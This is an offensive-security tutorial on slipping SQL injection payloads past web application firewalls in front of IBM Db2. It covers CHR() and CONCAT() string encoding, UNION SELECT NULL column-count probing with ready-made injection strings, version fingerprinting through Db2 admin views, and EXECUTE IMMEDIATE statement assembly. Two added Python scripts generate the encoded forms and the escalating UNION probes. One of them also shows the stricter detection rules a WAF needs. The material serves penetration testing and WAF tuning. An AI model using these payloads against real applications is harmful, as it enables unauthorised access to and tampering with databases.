Alternate Syntax

Context

In this article, we explore how to use alternate SQL syntax to bypass Web Application Firewalls (WAFs) placed in front of applications backed by IBM Db2. The focus is on syntax that produces the same result as a blocked payload while not matching the textual patterns a signature-based WAF looks for. It assumes a basic grasp of SQL query structure, Db2 built-in functions, and how pattern-based WAF rules work.

Theory

Alternate Syntax Techniques in SQL Injection

Alternate syntax in SQL injection means expressing the same operation with different SQL constructs. Signature-based WAFs match specific keywords, operators and literal strings, so a payload that spells the same operation differently can pass a rule written for one spelling. The full request still reaches the WAF: the technique only works against rules keyed to the form you changed, and a WAF that normalizes or decodes function calls before matching will still catch it.

CHR() Function Usage

In Db2 the function that converts a numeric code point into the corresponding character is CHR(); CHAR() is a different function that casts a value to a fixed-length character string, so CHAR(97) returns the string '97', not 'a'. Building a string out of CHR() calls joined with the || concatenation operator keeps the plaintext literal out of the request, which defeats a filter that looks for that literal between quotes.

CONCAT() Function Usage

CONCAT() joins two strings into one. In Db2 it takes exactly two arguments; the || operator is the equivalent infix form and can be chained. Splitting a filtered word into fragments that are joined at evaluation time defeats a signature that looks for the complete word, because the fragments are never adjacent in the request.

UNION SELECT NULL,NULL

UNION SELECT NULL,NULL is the standard way to find out how many columns the original query returns: a UNION branch must have the same number of columns as the original SELECT, and NULL is compatible with any column type, so adding one NULL at a time until the error disappears reveals the count. Two Db2 specifics apply. Every SELECT needs a FROM clause, so the branch is written SELECT NULL,NULL FROM SYSIBM.SYSDUMMY1, and Db2's strict typing can reject an untyped NULL in some positions, in which case CAST(NULL AS VARCHAR(1)) is used instead.

Version Obfuscation Techniques

Many WAF rule sets were written with MySQL and Microsoft SQL Server in mind, so they flag version fingerprinting such as version() or @@version. Db2 has neither; its version is read from catalog and administrative views such as SYSIBM.SYSVERSIONS and SYSIBMADM.ENV_INST_INFO, which generic signatures often do not list. Reading the version through those views, and reshaping the output with a CAST, lets a fingerprinting query pass rules that only know the other dialects' spellings.

INLINE CAST Usage

CAST converts a value to another data type inside the query. For WAF evasion it does two things: it changes the textual shape of the payload, since a value wrapped in CAST(... AS VARCHAR(n)) no longer matches a signature written for the bare expression, and it satisfies Db2's strict typing, for example when a NULL in a UNION branch or a number concatenated into a string would otherwise raise a type error. WAFs do not type-check data; the benefit lies in the altered text and in keeping Db2 from rejecting the query.

EXECUTE IMMEDIATE Statement

EXECUTE IMMEDIATE is a statement, not a function, and in Db2 it is only valid inside SQL PL, that is, in a compound statement (BEGIN ... END), stored procedure, function or trigger; it cannot be used to run a SELECT. It prepares and runs the SQL held in a string expression, so the statement text can be assembled at run time from fragments, CHR() calls and concatenations. Its relevance to WAF bypass is that the keywords of the executed statement need not appear contiguously in the HTTP request: the WAF sees only the fragments, while the database sees the assembled statement.

Practice

Bypassing WAF with CHR()

To bypass a WAF that filters a specific string literal, encode the string with CHR() and the || operator (Db2's CHAR() is a cast and cannot be used for this):

SELECT * FROM users WHERE username = CHR(97)||CHR(100)||CHR(109)||CHR(105)||CHR(110);

The expression evaluates to 'admin' on the database side, so the predicate matches the admin row while the literal 'admin' never appears in the request. A WAF rule that flags CHR( or || itself will still block the query.

Using CONCAT() for WAF Evasion

A pattern-based rule that looks for the whole word can be evaded by splitting the literal and joining the parts:

SELECT * FROM users WHERE username = CONCAT('ad','min');

The two fragments are joined at evaluation time, so the predicate is equivalent to username = 'admin' even though 'admin' is not present in the request. The same can be written as 'ad'||'min'; because Db2 limits CONCAT() to two arguments, longer splits use || or nested CONCAT() calls.
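The following Python script is an added example, not part of the original article, that ties the CHR() and CONCAT() sections together. It encodes a literal in both Db2 spellings, runs each form through two constructed WAF rules (one that matches the quoted literal, one that matches the obfuscation functions themselves), and evaluates the expressions with a small stand-in for Db2's string evaluation so you can see that every form resolves to the same value server-side. The rules, the evaluator and the users/username query are assumptions for illustration.

```python
import re

# Constructed signature in the style of a simple WAF rule: block any request
# whose SQL contains the quoted literal 'admin'. Real rule sets are larger,
# but each rule is keyed to one spelling of the payload in the same way.
LITERAL_RULE = re.compile(r"'\s*admin\s*'", re.IGNORECASE)

# A stricter, constructed rule that a WAF tuned for Db2 might add: flag the
# obfuscation functions themselves rather than the decoded value.
FUNCTION_RULE = re.compile(r"\bCHR\s*\(|\bCONCAT\s*\(|\|\|", re.IGNORECASE)


def db2_chr_encode(s: str) -> str:
    """Rewrite a string as Db2 CHR() calls joined by the || operator.
    Db2's CHAR() is a cast, so CHR() is the function that maps a code point
    to a character: CHR(97) -> 'a'."""
    return "||".join(f"CHR({ord(c)})" for c in s)


def db2_concat_split(s: str) -> str:
    """Split a string into two halves joined with CONCAT(); Db2's CONCAT()
    takes exactly two arguments, so longer splits would nest or use ||."""
    mid = len(s) // 2
    return f"CONCAT('{s[:mid]}','{s[mid:]}')"


def build_query(value_expr: str) -> str:
    """The query from the article with the username expression substituted."""
    return f"SELECT * FROM users WHERE username = {value_expr}"


def literal_rule_blocks(query: str) -> bool:
    return LITERAL_RULE.search(query) is not None


def function_rule_blocks(query: str) -> bool:
    return FUNCTION_RULE.search(query) is not None


def db2_evaluate_string_expr(expr: str) -> str:
    """Constructed stand-in for Db2's evaluation of a string expression built
    from CHR(n), CONCAT('a','b') and plain literals joined by ||. It exists to
    show that every encoding resolves to the same value on the database side.
    Literals containing || or quotes are not handled."""
    out = []
    for piece in expr.split("||"):
        piece = piece.strip()
        m = re.fullmatch(r"CHR\((\d+)\)", piece, re.IGNORECASE)
        if m:
            out.append(chr(int(m.group(1))))
            continue
        m = re.fullmatch(r"CONCAT\('([^']*)','([^']*)'\)", piece, re.IGNORECASE)
        if m:
            out.append(m.group(1) + m.group(2))
            continue
        m = re.fullmatch(r"'([^']*)'", piece)
        if m:
            out.append(m.group(1))
            continue
        raise ValueError(f"unsupported expression fragment: {piece!r}")
    return "".join(out)


def compare_forms(value: str) -> dict:
    """For the plain literal and both alternate spellings, record whether each
    constructed rule blocks the query and what the database would evaluate."""
    forms = {
        "literal": f"'{value}'",
        "chr": db2_chr_encode(value),
        "concat": db2_concat_split(value),
    }
    return {
        name: {
            "query": build_query(expr),
            "literal_rule_blocks": literal_rule_blocks(build_query(expr)),
            "function_rule_blocks": function_rule_blocks(build_query(expr)),
            "db_value": db2_evaluate_string_expr(expr),
        }
        for name, expr in forms.items()
    }


if __name__ == "__main__":
    for name, result in compare_forms("admin").items():
        print(name, result)
```

Running it shows the literal rule blocking only the plain form, while the function rule blocks both encoded forms and lets the plain literal through; a deployed WAF needs both kinds of rule, or normalization before matching, to cover all three spellings.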

UNION SELECT NULL,NULL for Column-Count Discovery

Determine the number of columns in the injected query by adding NULL placeholders until the database stops rejecting the column count. In Db2 the UNION branch needs a FROM clause, so select from SYSIBM.SYSDUMMY1:

SELECT name FROM users UNION SELECT NULL FROM SYSIBM.SYSDUMMY1;

The original query returns one column, so a single NULL matches; SELECT name FROM users UNION SELECT NULL,NULL FROM SYSIBM.SYSDUMMY1 fails with SQL0421N because the operands of the set operator do not have the same number of columns. As an injection the probe looks like ' UNION SELECT NULL FROM SYSIBM.SYSDUMMY1-- with the NULL list grown one entry at a time. The column check is performed by the database, not the WAF; NULL is used because it is type-compatible with any column and adds no keyword beyond UNION SELECT.
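The probing loop described above, as an added example that is not part of the original article. It generates the Db2-specific UNION probes (FROM SYSIBM.SYSDUMMY1, optional typed NULLs) and grows the placeholder list until a constructed stand-in for Db2's set-operator check accepts it. The column count of the target query and the check itself are assumptions; against a real target the same loop would submit each probe and look for the SQL0421N error in the response.

```python
import re


def union_probe_payload(n: int, typed: bool = False) -> str:
    """Build the Db2 UNION probe with n placeholders.

    Db2 requires a FROM clause on every SELECT, hence SYSIBM.SYSDUMMY1.
    typed=True uses CAST(NULL AS VARCHAR(1)) for positions where Db2
    rejects an untyped NULL.
    """
    placeholder = "CAST(NULL AS VARCHAR(1))" if typed else "NULL"
    return "' UNION SELECT " + ",".join([placeholder] * n) + " FROM SYSIBM.SYSDUMMY1--"


def simulated_db2_set_operator_check(payload: str, original_columns: int) -> str:
    """Constructed stand-in for the database's response: 'OK' when the UNION
    branch has the same number of columns as the original SELECT, SQL0421N
    (set-operator operands differ in column count) otherwise, and SQL0104N
    (syntax error) when the probe is not a well-formed Db2 UNION branch."""
    m = re.search(r"UNION SELECT (.+?) FROM SYSIBM\.SYSDUMMY1", payload)
    if m is None:
        return "SQL0104N"
    branch_columns = len(m.group(1).split(","))
    return "OK" if branch_columns == original_columns else "SQL0421N"


def find_column_count(original_columns: int, max_columns: int = 20, typed: bool = False) -> int:
    """Grow the placeholder list one entry at a time until the check passes.
    original_columns is the hidden value the loop is meant to discover; in a
    real engagement it would come from the target's error behaviour instead."""
    for n in range(1, max_columns + 1):
        probe = union_probe_payload(n, typed=typed)
        if simulated_db2_set_operator_check(probe, original_columns) == "OK":
            return n
    raise RuntimeError("column count exceeds max_columns")


if __name__ == "__main__":
    # Constructed target: the application selects two columns from users.
    for n in range(1, 4):
        probe = union_probe_payload(n)
        print(probe, "->", simulated_db2_set_operator_check(probe, 2))
    print("discovered column count:", find_column_count(2))
```

The typed variant is kept as a switch because Db2's untyped-NULL rejection depends on position and version; when the untyped probe never succeeds, rerun the loop with typed=True before concluding the injection point is not exploitable.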

Reading the Version with an Inline CAST

Db2 has no version() function, so generic rules that flag version() or @@version do not match a Db2 fingerprinting query. Read the version from an administrative view and cast it to the string form the rest of the payload needs:

SELECT CAST(service_level AS VARCHAR(64)) FROM SYSIBMADM.ENV_INST_INFO;

The same information is available from SYSIBM.SYSVERSIONS (versionnumber, version_timestamp). Note that CAST(x AS CHAR) without a length yields CHAR(1) and truncates the result to a single character.

Executing Assembled Statements with EXECUTE IMMEDIATE

Run a dynamically assembled statement from inside a compound SQL block (in the command line processor use a statement terminator other than ;, for example @). EXECUTE IMMEDIATE cannot run a SELECT, so the example updates rather than reads:

BEGIN
  DECLARE stmt VARCHAR(256);
  SET stmt = 'UPDATE users SET name = ' || '''' || CHR(97) || 'dmin' || '''' || ' WHERE username = ''admin''';
  EXECUTE IMMEDIATE stmt;
END

The string passed to EXECUTE IMMEDIATE is assembled on the database side, so the text of the final statement is never sent in one piece. This only helps against a WAF when the application already exposes a path into SQL PL, for example a stored procedure that builds its statement from user input; the request itself still contains the fragments and can be matched on those.

Tools

  • Db2 SQL Editor
  • SQLMap
